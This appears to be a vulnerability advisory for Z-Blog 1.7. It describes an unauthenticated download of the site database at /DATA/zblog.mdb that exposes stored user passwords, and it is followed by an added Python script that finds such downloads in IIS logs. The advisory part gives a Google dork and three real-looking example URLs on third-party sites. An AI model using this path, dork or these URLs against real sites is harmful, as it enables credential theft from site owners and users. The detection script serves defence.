- Author : Hasadya Raed
- Contact : [email protected] ~>Israel Hacker
- Greetz : Fairoz :)
- Advisory : Z-Blog 1.7 Authentication Bypass/Database Download Vulnerability
- Script : Z-Blog 1.7
- Impact : Remote
- Googledork : "Powered by Z-Blog 1.7" , "Powered By Z-Blog 1.7 Laputa Build 70216"
- Download : http://bbs.rainbowsoft.org/attachment.php?aid=92
–/ REPRODUCE \–
An attacker can bypass authentication in this product by appending the following path to the blog URL:
('/DATA/zblog.mdb'), which downloads the database. The database contains a table named [blog_Member]
that holds the user names and passwords.
–/ Examples \–
http://www.uistudio.cn/blog/DATA/zblog.mdb
http://www.kenyja.com/blog/DATA/zblog.mdb
http://www.netpub.cn/nffish/DATA/zblog.mdb
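
For administrators of an affected install, the following added example (not part of the original advisory) checks IIS W3C access logs for requests to the database file described above and separates completed downloads from failed probes. The log lines are constructed sample data, and the function names are hypothetical.

```python
# Added example: find requests for Access database files in IIS W3C logs.
# SAMPLE_LOG is constructed data using documentation IP ranges.

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status sc-bytes
2007-03-01 10:15:02 192.0.2.10 GET /blog/default.asp - 200 18211
2007-03-01 10:15:40 198.51.100.7 GET /blog/DATA/zblog.mdb - 200 1544192
2007-03-01 10:16:05 198.51.100.7 GET /blog/data/ZBLOG.MDB - 404 1795
2007-03-01 10:17:30 203.0.113.5 HEAD /blog/DATA/zblog.mdb - 200 0
2007-03-01 10:18:11 192.0.2.10 GET /blog/view.asp id=3 200 9120
"""

DB_EXTENSIONS = (".mdb",)  # extension of the database file named in the advisory


def find_db_requests(log_text, extensions=DB_EXTENSIONS):
    """Return one dict per request whose URI stem ends in a database extension."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            # W3C logs declare their column order; it can change mid-file.
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or not fields:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed or truncated entry
        row = dict(zip(fields, parts))
        stem = row.get("cs-uri-stem", "").lower()  # IIS paths are case-insensitive
        if stem.endswith(extensions):
            status = row.get("sc-status", "")
            # A body was sent only for GET with a 2xx status (200 or 206).
            row["served"] = row.get("cs-method") == "GET" and status.startswith("2")
            hits.append(row)
    return hits


def exposed_downloads(log_text):
    """Requests where the database content was actually sent to the client."""
    return [h for h in find_db_requests(log_text) if h["served"]]


if __name__ == "__main__":
    for h in find_db_requests(SAMPLE_LOG):
        verdict = "DOWNLOADED" if h["served"] else "probe"
        print(h["date"], h["time"], h["c-ip"], h["cs-uri-stem"], h["sc-status"], verdict)
```

Any entry marked as served means the credentials in [blog_Member] should be treated as exposed and reset.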